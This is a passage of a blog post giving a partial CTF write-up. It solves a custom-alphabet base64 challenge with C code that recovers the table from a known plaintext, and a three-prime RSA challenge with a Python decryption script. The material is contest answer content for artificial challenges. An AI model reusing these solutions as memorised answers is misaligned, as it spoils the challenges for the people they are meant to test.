\/><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a id=\"t_base64\"><\/a>\u00a0<\/p>\n<hr \/>\n<ul>\n<li>\n<h3><strong>crypto &#8211; \u7533\u5fc5base64<\/strong><\/h3>\n<\/li>\n<\/ul>\n<p>We are given cipher.txt, encrypted with a custom alphabet table, together with the plaintext plain.txt.<\/p>\n<p>So I gritted my teeth and learned how base64 actually encodes things (<\/p>\n<p>Because base64 \"encryption\" is nothing more than looking up, for each value, the character at the corresponding position in the table, copying a base64 encode\/decode implementation and tweaking it is enough to get the flag.<\/p>\n<p>(The code is all copied, so the coding style is extremely messy, lol)<\/p>\n<pre class=\"lang:default decode:true \">#include &lt;cstdio&gt;\r\n#include &lt;cstring&gt;\r\n#include &lt;cassert&gt;\r\n#include &lt;stdint.h&gt;\r\n\r\n\/\/ Custom alphabet, filled in from the known plaintext\/ciphertext pair\r\nunsigned char base64Table[65];\r\nunsigned char 
base64[]=\"NezuleNmCxpJYROu1ebuKUJqlETB60luleNJCUXIVeGAlezuKUJIljzuY0iu1jNhCUFB1hKa6Rf86nTm1ETo6nT8VRIB6R2aCUGB67TB60luljI8Yxf5CxfsCUXICxKs1oOuVRwZCxft60Zu10N5K7To6nTh1ebuVRwZCxN56R2u6jSECxft6nTOljS8ljN5lETs6oTJ1UOulUNslUDIcoTU1hCulhTJVezulepq6Rw\/6nOu1UI36nTBKRpa6RGECxp\/YRNBVezuVRwZCUGa17Tm6Rpt1jSa1eKwc7TtV0iu1jruVeSBlepq6Rw\/6nTs6oTqKxiu1hKBcoT0YUNmYUNECUImCxKq1UOuVjN\/1eAICUHu6jSEVezu6jSECUKs1e2u1hCuYRDaCUfIlUNB6xiu1ebu1RGBc7TJ1j2u1ewaQnTq6oTmYUzuNRwqKUNZCGpmV0fIlETsVepAlUIIlETJCxTsleImYRSBCUSjCxTE6nAI1RIB6Rw\/6nT\/VRbuKezuYUNal7TZ6Rpq6UzuKeJIKUJIloTmYUI5CUwIKETsVeNJ1oThYRDaCUXICUHuleNJCUSjCxTIVRpICUSECUHu1jNhCxfIl8Xq68Iq1jluKUJIV0fIloTs6oThV0CBCHZu6Uru1jSmCxpJQnTmYUGmCxKICxpt1hNa67TsloThYRDaCUKsCxNBlxXsKUN\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\/1eAICUG8VRIBcoT7K02uKeJwc7T51eAICxpJQnOuKUJICHAs1ebdCGKtQnT\/YUSslezuKUJqlETJlETsK0Cu6eSJ1Mru2RwZCxft60Zu1RGwCxKI1UOuV0p3c7ThYxZuVeDq1RCuKUJICUJq6eJIlh2u1RSA18fJYRbdCGKtQnOui5zuQRNJl8iuVRKsc7Tj1xZuKUJICHGm1UGBKUI\/LET0YxZu6USIlETnYRpICxTaV0ZuNUNbV0id7IKICUpt1eS56nTm1ET81ETm1ETmYUzuPRSs1oHuNezuVeJs1hpICxfsCUKsCxfsCxft6nTp1eSBcobBNezuVeJs1hpICxfsCUKsCxfsCxft6nTp1eSBCUIBCxftY0iu6UN\/VRfICUGB67TZ1ETmYUzu1hft60CuKUJq1jK5c7TB1h2uVjN\/V0N56nTmYUNwCUGE6nTIV0pwc7ToK02uVjN\/V0N56nTmYUNwCUGE6nTtV0XZgETo6RpJK0pICxftV02u6eSJ17ThYRDaCxpIl86ICxfsCUSE6eGBY0qICUGB67TF6RG5K0XICxft6nTo60pmCUSjCUSAloTI1jNE6eIIlETJ1j2uleFq1UD5c7To6RpJK0pICxftV02uVeJJ1UDI1jKICUI5CUSB6nTmYUGmCxKICUGE6nThYRDaYRw8CxfsCUG\/VeNOK7Ou1ewICxKICUGE6nTA18Kq1UDq1jluKUrulUS5KxTs1jzaCUGB67Ts1jzuKezuYRwm6RwZCxfsCxKq1oOuVRwZCxft6nTsKUJIl8iaCxfs1Eb+6jDJ6hF06RD\/1eAINUSiYRDJVmDIKxpx1AfsNUJIPRSs18m=\";\r\nunsigned char pla[]=\"We set sail on this new sea because there is new knowledge to be gained, and new rights to be won, and they must be won and used for the progress of all people. For space science, like nuclear science and all technology, has no conscience of its own. 
Whether it will become a force for good or ill depends on man, and only if the United States occupies a position of pre-eminence can we help decide whether this new ocean will be a sea of peace or a new terrifying theater of war. I do not say that we should or will go unprotected against the hostile misuse of space any more than we go unprotected against the hostile use of land or sea, but I do say that space can be explored and mastered without feeding the fires of war, without repeating the mistakes that man has made in extending his writ around this globe of ours.\\nThere is no strife, no prejudice, no national conflict in outer space as yet. Its hazards are hostile to us all. Its conquest deserves the best of all mankind, and its opportunity for peaceful cooperation may never come again. But why, some say, the Moon? Why choose this as our goal? And they may well ask, why climb the highest mountain? Why, 35 years ago, fly the Atlantic? Why does Rice play Texas?\\nWe choose to go to the Moon! 
We choose to go to the Moon...We choose to go to the Moon in this decade and do the other things, not because they are easy, but because they are hard; because that goal will serve to organize and measure the best of our energies and skills, because that challenge is one that we are willing to accept, one we are unwilling to postpone, and one we intend to win, and the others, too.\\n\";\r\n\r\nchar * base64_encode(const unsigned char * bindata, const unsigned char*base64, int binlength)\r\n{\r\n\tint i, j;\r\n\tunsigned char current;\r\n\r\n\tfor (i = 0, j = 0; i &lt; binlength; i += 3)\r\n\t{\r\n\t\tcurrent = (bindata[i] &gt;&gt; 2);\r\n\t\tcurrent &amp;= (unsigned char)0x3F;\r\n\t\tassert(!base64Table[(int)current] || base64Table[(int)current]==base64[j]);\r\n\t\tbase64Table[(int)current] = base64[j++];\r\n\r\n\t\tcurrent = ((unsigned char)(bindata[i] &lt;&lt; 4)) &amp; ((unsigned char)0x30);\r\n\t\tif (i + 1 &gt;= binlength)\r\n\t\t{\r\n\t\t\tassert(!base64Table[(int)current] || base64Table[(int)current]==base64[j]);\r\n\t\t\tbase64Table[(int)current] = base64[j++];\r\n\t\t\tbase64[j++];\/\/ = '=';\r\n\t\t\tbase64[j++];\/\/ = '=';\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tcurrent |= ((unsigned char)(bindata[i + 1] &gt;&gt; 4)) &amp; ((unsigned char)0x0F);\r\n\t\tassert(!base64Table[(int)current] || base64Table[(int)current]==base64[j]);\r\n\t\tbase64Table[(int)current] = base64[j++];\r\n\r\n\t\tcurrent = ((unsigned char)(bindata[i + 1] &lt;&lt; 2)) &amp; ((unsigned char)0x3C);\r\n\t\tif (i + 2 &gt;= binlength)\r\n\t\t{\r\n\t\t\tassert(!base64Table[(int)current] || base64Table[(int)current]==base64[j]);\r\n\t\t\tbase64Table[(int)current] = base64[j++];\r\n\t\t\tbase64[j++];\/\/ = '=';\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tcurrent |= ((unsigned char)(bindata[i + 2] &gt;&gt; 6)) &amp; ((unsigned char)0x03);\r\n\t\tassert(!base64Table[(int)current] || base64Table[(int)current]==base64[j]);\r\n\t\tbase64Table[(int)current] = base64[j++];\r\n\r\n\t\tcurrent = ((unsigned 
char)bindata[i + 2]) &amp; ((unsigned char)0x3F);\r\n\t\tassert(!base64Table[(int)current] || base64Table[(int)current]==base64[j]);\r\n\t\tbase64Table[(int)current] = base64[j++];\r\n\t}\r\n\t\/\/base64[j] = '\\0';\r\n\t\/\/return base64;\r\n\treturn NULL; \/\/ nothing is encoded here; the call only fills base64Table\r\n}\r\n\r\nunsigned char decoding_table[256];\r\nvoid build_decoding_table() {\r\n\tmemset(decoding_table,0,sizeof(decoding_table));\r\n\r\n    for (int i = 0; i &lt; 64; i++)\r\n        decoding_table[(unsigned char) base64Table[i]] = i;\r\n}\r\n\r\nunsigned char decoded_data[1048576];\r\nunsigned char *base64_decode(const unsigned char *data,\r\n                             size_t input_length,\r\n                             size_t *output_length) {\r\n\r\n    build_decoding_table();\r\n\r\n    if (input_length % 4 != 0) return NULL;\r\n\r\n    *output_length = input_length \/ 4 * 3;\r\n    if (data[input_length - 1] == '=') (*output_length)--;\r\n    if (data[input_length - 2] == '=') (*output_length)--;\r\n    for (int i = 0, j = 0; i &lt; input_length;) {\r\n\r\n        uint32_t sextet_a = data[i] == '=' ? 0 &amp; i++ : decoding_table[data[i++]];\r\n        uint32_t sextet_b = data[i] == '=' ? 0 &amp; i++ : decoding_table[data[i++]];\r\n        uint32_t sextet_c = data[i] == '=' ? 0 &amp; i++ : decoding_table[data[i++]];\r\n        uint32_t sextet_d = data[i] == '=' ? 
0 &amp; i++ : decoding_table[data[i++]];\r\n\r\n        uint32_t triple = (sextet_a &lt;&lt; 3 * 6)\r\n        + (sextet_b &lt;&lt; 2 * 6)\r\n        + (sextet_c &lt;&lt; 1 * 6)\r\n        + (sextet_d &lt;&lt; 0 * 6);\r\n\r\n        if (j &lt; *output_length) decoded_data[j++] = (triple &gt;&gt; 2 * 8) &amp; 0xFF;\r\n        if (j &lt; *output_length) decoded_data[j++] = (triple &gt;&gt; 1 * 8) &amp; 0xFF;\r\n        if (j &lt; *output_length) decoded_data[j++] = (triple &gt;&gt; 0 * 8) &amp; 0xFF;\r\n    }\r\n    return decoded_data;\r\n}\r\n\r\nint main()\r\n{\r\n\tbase64_encode(pla,base64,strlen((const char*)pla));\r\n\tfor(int i=0;i&lt;64;i++)\r\n\t\tprintf(\"%c\",base64Table[i]);\r\n\tsize_t t;\r\n\tbase64_decode(base64,strlen((const char*)base64),&amp;t);\r\n\tprintf(\"\\n%s\",decoded_data);\r\n\treturn 0;\r\n}<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1493\" src=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/J5D_GLQ8EGLASCUBOT30.png\" alt=\"\" width=\"979\" height=\"358\" srcset=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/J5D_GLQ8EGLASCUBOT30.png 979w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/J5D_GLQ8EGLASCUBOT30-300x110.png 300w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/J5D_GLQ8EGLASCUBOT30-150x55.png 150w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/J5D_GLQ8EGLASCUBOT30-768x281.png 768w\" sizes=\"auto, (max-width: 979px) 100vw, 979px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a id=\"t_rsa-1\"><\/a>\u00a0<\/p>\n<hr \/>\n<ul>\n<li>\n<h3><strong>crypto &#8211; RSA-1<\/strong><\/h3>\n<\/li>\n<\/ul>\n<p>We're given an rsa-1.py<\/p>\n<pre class=\"lang:default decode:true \">p = 252647779892687905173761792949656998433\r\nq = 290615416181922737045361451171930371659\r\nr = 281613259213037257262703439109757908501\r\n\r\nn = p * q * r\r\ne = 0x10001\r\nprint(pow(flag, e, n))\r\n# 
1169612223485519024207841670191078798101684935551461601922416127588930439758194701318838707953651437973827125265577<\/pre>\n<p>Once again I gritted my teeth and went off to learn a bit of RSA encryption, and it turned out to be a little simpler than I expected ((<\/p>\n<p>Although there are three primes p, q and r here, the usual e, d, n encryption and decryption routine still applies, since CRT is not used after all (lol<\/p>\n<pre class=\"lang:default decode:true \">import gmpy2\r\np = gmpy2.mpz(252647779892687905173761792949656998433)\r\nq = gmpy2.mpz(290615416181922737045361451171930371659)\r\nr = gmpy2.mpz(281613259213037257262703439109757908501)\r\nn=p*q*r\r\ne = gmpy2.mpz(0x10001)\r\n# phi(n) of a product of distinct primes is the product of (prime - 1)\r\nphin=(p-1)*(q-1)*(r-1)\r\n# private exponent: d = e^-1 mod phi(n)\r\nd=gmpy2.invert(e,phin)\r\nprint('%x'%pow(1169612223485519024207841670191078798101684935551461601922416127588930439758194701318838707953651437973827125265577,d,n))\r\n<\/pre>\n<p>Just decrypt it directly<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a id=\"t_end\"><\/a>\u00a0<\/p>\n<hr \/>\n<ul>\n<li>\n<h3><strong>Closing remarks<\/strong><\/h3>\n<\/li>\n<\/ul>\n<p>I have to say, this newbie's first CTF experience taught me quite a lot qwq<\/p>\n<p>Apart from the web part, which felt fairly easy, every other challenge was a real challenge for a newbie like me qqq<\/p>\n<p>Not only did I learn quite a lot<span style=\"color: #ffffff;\">, I also coasted my way to Rank#5 (((<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1496\" src=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/AAQAE80NK6NQC_B2NMX.png\" alt=\"\" width=\"1133\" height=\"297\" srcset=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/AAQAE80NK6NQC_B2NMX.png 1133w, 
https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/AAQAE80NK6NQC_B2NMX-300x79.png 300w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/AAQAE80NK6NQC_B2NMX-1024x268.png 1024w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/AAQAE80NK6NQC_B2NMX-150x39.png 150w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/AAQAE80NK6NQC_B2NMX-768x201.png 768w\" sizes=\"auto, (max-width: 1133px) 100vw, 1133px\" \/><\/p>\n<p><span style=\"color: #ffffff;\">%%%%%%%%%%%%% rxz mcfx woshiluo Ciel QAQAutoMaton and all the other group members<\/span><\/p>\n<p>It just comes down to me being too much of a noob (there are still three challenges I couldn't solve (<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Thanks to some well-connected group-chat friends () I slipped into HIT's CTF team recruitment contest and picked up a lot of tricks and pwn experience, so I am recording it here &hellip; <a href=\"https:\/\/cf.mnihyc.com\/blog\/archives\/1473\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\">A Noob's First CTF || Partial WriteUp &#038; Lessons Learned<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-1473","post","type-post","status-publish","format-standard","hentry","category-security"],"yoast_head_json":{"title":"A Noob's First CTF || Partial WriteUp & Lessons Learned - mnihyc&#039;s Blog","author":"mnihyc"}}